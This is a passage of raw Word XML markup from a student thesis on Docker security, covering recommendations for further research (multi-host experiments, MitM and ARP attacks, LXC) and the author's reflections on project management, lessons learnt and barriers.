      <w:r w:rsidR="00DE3E01">
        <w:t xml:space="preserve">fundamentally </w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve">secure to use. The fundamental problem </w:t>
      </w:r>
      <w:r w:rsidR="00D149AC">
        <w:t>lies in the integrity and authenticity of Docker images</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve">, specifically </w:t>
      </w:r>
      <w:r w:rsidR="00D149AC">
        <w:t>with the</w:t>
      </w:r>
      <w:r w:rsidR="00481400">
        <w:t xml:space="preserve"> Docker Hub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E32AFF" w14:textId="5841588D" w:rsidR="00275E11" w:rsidRDefault="00664BC3" w:rsidP="00664BC3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="158" w:name="_Toc86859310"/>
      <w:r>
        <w:t>RECOMMENDATIONS FOR FURTHER RESEARCH</w:t>
      </w:r>
      <w:bookmarkEnd w:id="158"/>
    </w:p>
    <w:p w14:paraId="300115A5" w14:textId="64803675" w:rsidR="00DE3E01" w:rsidRDefault="00CB23A7" w:rsidP="00236CFC">
      <w:r>
        <w:t xml:space="preserve">This project has highlighted </w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> researchable aspects that could be pursued for further study.</w:t>
      </w:r>
      <w:r w:rsidR="00F434D3">
        <w:t xml:space="preserve"> The experiments were undertaken on a single host machine, although the attacks can be replicated using multiple host machines.</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>he author’s opinion</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t xml:space="preserve"> that this project could be further researched, involv</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve">ing </w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>multiple hosts connected through network</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00A80B33">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve"> Further, this project highlighted focusing on three </w:t>
      </w:r>
      <w:r w:rsidR="00093277">
        <w:t>attacks</w:t>
      </w:r>
      <w:r w:rsidR="00AD4B24">
        <w:t xml:space="preserve"> only.</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> Therefore, further </w:t>
      </w:r>
      <w:r w:rsidR="00C00FFB">
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> of this project would be to research and experiment</w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>comprising</w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t xml:space="preserve"> more</w:t>
      </w:r>
      <w:r w:rsidR="00302118">
        <w:t xml:space="preserve"> security </w:t>
      </w:r>
      <w:r w:rsidR="00C46B4D">
        <w:t>threats</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t xml:space="preserve"> of Docker</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>, such as MitM and ARP poisoning attacks</w:t>
      </w:r>
      <w:r w:rsidR="00DC5F2C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> Another attractive area that could be further explored is examin</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t xml:space="preserve"> the security of LXC containers as they are the foundation of Docker technology</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t>. S</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>uch</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t xml:space="preserve"> study could result </w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidR="008874DB">
        <w:t>a constructive</w:t>
      </w:r>
      <w:r w:rsidR="00A03F95">
        <w:t xml:space="preserve"> and critical analysis that is essential and might contribute to Docker security</w:t>
      </w:r>
      <w:r w:rsidR="00C13293">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2CC53D" w14:textId="273DBF1D" w:rsidR="004B64B6" w:rsidRDefault="000C3AA9" w:rsidP="00E84EBF">
      <w:r>
        <w:t xml:space="preserve"> Further, this thesis evaluated </w:t>
      </w:r>
      <w:r w:rsidR="001F3DB2">
        <w:t xml:space="preserve">the security of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Docker containerization </w:t>
      </w:r>
      <w:r w:rsidR="00DE3E01">
        <w:t>only</w:t>
      </w:r>
      <w:r>
        <w:t>. Therefore, analysing and comparing the security of Docker with other containerization technolog</w:t>
      </w:r>
      <w:r w:rsidR="00DE3E01">
        <w:t>ies is another interesting area to look at</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t>, as it is inclusive.</w:t>
      </w:r>
      <w:r w:rsidR="005027FB">
        <w:t xml:space="preserve"> Such studies could lead to</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve">more insightful and comprehensive security analysis </w:t>
      </w:r>
      <w:r w:rsidR="00EF7C68">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t xml:space="preserve"> the current containerization technologies</w:t>
      </w:r>
      <w:r w:rsidR="00EF7C68">
        <w:t xml:space="preserve"> in general</w:t>
      </w:r>
      <w:r w:rsidR="00430AE1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> Finally, further research on this or related topics, specifically of Docker security</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> would be essential and </w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t>boon to the Dev ops and engineers</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008F12A8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00225A5F">
        <w:t xml:space="preserve">as it is a recent technology and needs </w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t>supplementary studies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEDFF60" w14:textId="476AF06C" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="6C964476" w14:textId="5BCD4BEA" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="6DE64352" w14:textId="77777777" w:rsidR="00125B77" w:rsidRDefault="00125B77" w:rsidP="00E84EBF"/>
    <w:p w14:paraId="5D718D09" w14:textId="630234AA" w:rsidR="009719B1" w:rsidRDefault="0095526E" w:rsidP="009719B1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="159" w:name="_Toc86859311"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00125B77">
        <w:t xml:space="preserve"> REFLECTIONS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="159"/>
    </w:p>
    <w:p w14:paraId="66AB5125" w14:textId="658CDF04" w:rsidR="00D12660" w:rsidRDefault="00D12660" w:rsidP="00D12660">
      <w:r>
        <w:t xml:space="preserve">The research was </w:t>
      </w:r>
      <w:r w:rsidR="00192DCD">
        <w:t xml:space="preserve">conducted using </w:t>
      </w:r>
      <w:r>
        <w:t>a wide variety of method</w:t>
      </w:r>
      <w:r w:rsidR="00192DCD">
        <w:t>ological and scientific approaches to solving the research question</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve"> discussed in section 5.1.</w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t xml:space="preserve"> As shown in the report,</w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve">overall </w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t>objectives</w:t>
      </w:r>
      <w:r w:rsidR="00024158">
        <w:t xml:space="preserve"> and aims</w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t xml:space="preserve"> established for this project were accomplished </w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EF1D2D">
        <w:t>success</w:t>
      </w:r>
      <w:r w:rsidR="00091D7D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve"> Throughout the project, the author faced many challenges and obstacles to reach </w:t>
      </w:r>
      <w:r w:rsidR="00154E6A">
        <w:t>the project’s</w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve"> goals </w:t>
      </w:r>
      <w:r w:rsidR="008906D2">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t xml:space="preserve">had learnt </w:t>
      </w:r>
      <w:r w:rsidR="00154E6A">
        <w:t xml:space="preserve">several </w:t>
      </w:r>
      <w:r w:rsidR="002C4FC4">
        <w:t>beneficial lessons.</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> The author had </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>limited</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> knowledge </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="00270730">
        <w:t xml:space="preserve"> Docker systems as it is a recent technology</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">. Besides, the research requires </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>excellent</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve"> technical knowledge and understanding of Linux OS. </w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">he author conducted extensive research and study on the internet about </w:t>
      </w:r>
      <w:r w:rsidR="00D35231">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00A47831">
        <w:t xml:space="preserve">Docker and </w:t>
      </w:r>
      <w:r w:rsidR="00D35231">
        <w:t>Linux technologies</w:t>
      </w:r>
      <w:r w:rsidR="008F1C9A">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="008555D3">
        <w:t>guide and assist with the implementation and design of the attacks.</w:t>
      </w:r>
      <w:r w:rsidR="00FC23FC">
        <w:t xml:space="preserve"> The thesis</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve">’s design was organised </w:t>
      </w:r>
      <w:r w:rsidR="00C46F67">
        <w:t>in a way that is</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> linear sequential phases to make </w:t>
      </w:r>
      <w:r w:rsidR="000E0B1F">
        <w:t>it academic and professional.</w:t>
      </w:r>
      <w:r w:rsidR="006377C0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68548906" w14:textId="6251A12E" w:rsidR="00C46F67" w:rsidRDefault="00C46F67" w:rsidP="00D12660">
      <w:r>
        <w:t>Throughout this thesis</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> the author has gained and acquired </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve">many </w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve">skills </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve">and bits of knowledge, </w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t>particular</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> in the </w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t>field</w:t>
      </w:r>
      <w:r w:rsidR="00747482">
        <w:t xml:space="preserve"> of Docker security and systems.</w:t>
      </w:r>
      <w:r w:rsidR="00A23FD6">
        <w:t xml:space="preserve"> Some of the skills learned and developed are listed below</w:t>
      </w:r>
      <w:r w:rsidR="005B23E4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A14D3B" w14:textId="237CCFE7" w:rsidR="005B23E4" w:rsidRDefault="005B23E4" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Time management:</w:t>
      </w:r>
      <w:r w:rsidR="002447D8">
        <w:t xml:space="preserve"> the author has layout well-ordered tasks and activities </w:t>
      </w:r>
      <w:r w:rsidR="005769D4">
        <w:t>to be fulfilled within a packed schedule to attain the objectives of this project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355091A1" w14:textId="7CEE23FC" w:rsidR="005769D4" w:rsidRDefault="002248CD" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Project management: utilising a Gantt chart to organise</w:t>
      </w:r>
      <w:r w:rsidR="003C3329">
        <w:t xml:space="preserve"> and follow</w:t>
      </w:r>
      <w:r w:rsidR="00641CFC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C3329">
        <w:t>up the project’s progress</w:t>
      </w:r>
      <w:r w:rsidR="00A21C66">
        <w:t xml:space="preserve"> has helped the author </w:t>
      </w:r>
      <w:r w:rsidR="00641CFC">
        <w:t>deliver the project within the given time frame with minimum stress level.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E76C06" w14:textId="76190C84" w:rsidR="008F222E" w:rsidRDefault="008F222E" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Working under pressure: </w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t xml:space="preserve">family life, work combined with other modules to deliver was </w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t>difficult task. On top of that</w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="009D36A2">
        <w:t xml:space="preserve"> the thesis was allocated </w:t>
      </w:r>
      <w:r w:rsidR="00221ED6">
        <w:t>to three months only. However, the author managed to balance the progress effectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0209B5" w14:textId="6B61A438" w:rsidR="00221ED6" w:rsidRDefault="00B517EB" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Contingency planning: identifying the potential risks that could occur during the development of this project using risk management techniques ha</w:t>
      </w:r>
      <w:r w:rsidR="00651A25">
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> helped the author</w:t>
      </w:r>
      <w:r w:rsidR="001636BB">
        <w:t xml:space="preserve"> resume the project when the gns3 software crashed.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5DFE6" w14:textId="55D3EA9B" w:rsidR="00651A25" w:rsidRDefault="008814AF" w:rsidP="005B23E4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Schedule and prioritise tasks: each </w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve">task </w:t>
      </w:r>
      <w:r w:rsidR="00D40472">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve"> essential to the project’s success; however, they were scheduled and arranged based on importance, urgency and complexity, given more time to the </w:t>
      </w:r>
      <w:r w:rsidR="00D40472">
        <w:t>testing and experimenting</w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve"> section. Th</w:t>
      </w:r>
      <w:r w:rsidR="004C2F14">
        <w:t>is way</w:t>
      </w:r>
      <w:r w:rsidR="00600E9C">
        <w:t xml:space="preserve">, the author has </w:t>
      </w:r>
      <w:r w:rsidR="009B3A89">
        <w:t>benefited from prioritising tasks</w:t>
      </w:r>
      <w:r w:rsidR="004C2F14">
        <w:t xml:space="preserve"> and learnt how to schedule tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3576E5F1" w14:textId="25B6176C" w:rsidR="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55AD59CF" w14:textId="765B304A" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23587BC6" w14:textId="77777777" w:rsidR="00093277" w:rsidRDefault="00093277" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1727F1" w14:textId="2D602206" w:rsidR="004C2F14" w:rsidRDefault="004C2F14" w:rsidP="004C2F14">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C2F14">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Lessons learnt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0600FE" w14:textId="15507868" w:rsidR="004C2F14" w:rsidRDefault="001611E8" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scheduling and dividing tasks into smaller subsections to manage and simplify the work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27E29B" w14:textId="3A5ECCB3" w:rsidR="001611E8" w:rsidRDefault="003909CF" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How to schedule and pr</w:t>
      </w:r>
      <w:r w:rsidR="00D376A9">
        <w:t>ioritise tasks accordingly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DFD29B" w14:textId="25664AA4" w:rsidR="00D376A9" w:rsidRDefault="00D376A9" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Planning and identifying the risks ahead </w:t>
      </w:r>
      <w:r w:rsidR="005131DE">
        <w:t xml:space="preserve">makes </w:t>
      </w:r>
      <w:r w:rsidR="00E22A65">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="005131DE">
        <w:t xml:space="preserve">significant difference to any project. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E97249A" w14:textId="66CF5E4F" w:rsidR="005131DE" w:rsidRDefault="005131DE" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To be committed to the schedules</w:t>
      </w:r>
      <w:r w:rsidR="00E22A65">
        <w:t xml:space="preserve"> and how to stay motivated</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61E91F" w14:textId="70B7CD9F" w:rsidR="00E22A65" w:rsidRDefault="00E22A65" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How to accomplish the aims and objectives of a project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565843C9" w14:textId="64EC0412" w:rsidR="00E22A65" w:rsidRDefault="00E22A65" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>How</w:t>
      </w:r>
      <w:r w:rsidR="004565F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A00D44">
        <w:t>to identify the potential risks</w:t>
      </w:r>
      <w:r w:rsidR="004565F2">
        <w:t xml:space="preserve"> and apply contingency planning during the development of a project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FFB904B" w14:textId="1E6AE342" w:rsidR="0008759F" w:rsidRDefault="004565F2" w:rsidP="001611E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create multiple back up </w:t>
      </w:r>
      <w:r w:rsidR="0008759F">
        <w:t>locations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="002D674B">
        <w:t xml:space="preserve">document and </w:t>
      </w:r>
      <w:r>
        <w:t>save the works regularly</w:t>
      </w:r>
      <w:r w:rsidR="0008759F">
        <w:t xml:space="preserve"> and to avoid data loss</w:t>
      </w:r>
      <w:r w:rsidR="002D674B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059D21F0" w14:textId="77777777" w:rsidR="00061A8B" w:rsidRDefault="00061A8B" w:rsidP="00061A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1817BB90" w14:textId="5D074090" w:rsidR="0008759F" w:rsidRDefault="0008759F" w:rsidP="0008759F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008759F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Things that could have been done differently</w:t>
      </w:r>
      <w:r w:rsidR="004565F2" w:rsidRPr="0008759F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A44B2CB" w14:textId="0C2A9768" w:rsidR="00061A8B" w:rsidRDefault="00061A8B" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">Finding the right topic </w:t>
      </w:r>
      <w:r w:rsidR="00385F27">
        <w:t xml:space="preserve">coupled with other modules has led to starting the project late than </w:t>
      </w:r>
      <w:r w:rsidR="00606F02">
        <w:t>expected. Although the author managed to quickly recover on track to finish the project, the project could have been started earlier to produce quality work and avoid frustration and stress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FF30D8" w14:textId="3291F724" w:rsidR="008B1D23" w:rsidRDefault="008B1D23" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">The research topic </w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t xml:space="preserve">is a recent technology and </w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t>demands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in-depth technical skills and knowledge of Docker, Linux, and scripting</w:t>
      </w:r>
      <w:r w:rsidR="007E20BF">
        <w:t xml:space="preserve"> languages</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D15459">
        <w:t>Although the author could have referred to experienced people for better knowledge and outcome, a</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t>ny technical issues</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t xml:space="preserve"> faced were resolved</w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t xml:space="preserve"> through </w:t>
      </w:r>
      <w:r w:rsidR="00D918A3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00EA44DA">
        <w:t>research and self-</w:t>
      </w:r>
      <w:r w:rsidR="00B5623C">
        <w:t>learning approach</w:t>
      </w:r>
      <w:r w:rsidR="00D15459">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003FA650" w14:textId="1A199C28" w:rsidR="0096369A" w:rsidRDefault="0096369A" w:rsidP="0008759F">
      <w:r>
        <w:t xml:space="preserve">The implementation section should have been allocated adequate time as it was </w:t>
      </w:r>
      <w:r w:rsidR="008B1D23">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">complicated </w:t>
      </w:r>
      <w:r w:rsidR="008B1D23">
        <w:t xml:space="preserve">and challenging </w:t>
      </w:r>
      <w:r>
        <w:t>task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63886E1D" w14:textId="07DF9FF5" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="0008759F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D15459">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Barriers experienced during this project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29083C9E" w14:textId="6EE48177" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="0008759F">
      <w:r>
        <w:t>Some of the obstacles that the author faced throughout the project are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47AC10" w14:textId="603F0B4F" w:rsidR="00D15459" w:rsidRDefault="00D15459" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The time allocated was insufficient.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA1C0EB" w14:textId="7075D052" w:rsidR="00A84713" w:rsidRDefault="00A84713" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Time management was </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>a complex</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00101BD4">
        <w:t>issue due to workload from other modules and family responsibilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27366891" w14:textId="23DFFD37" w:rsidR="00101BD4" w:rsidRDefault="00F6531A" w:rsidP="00D15459">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
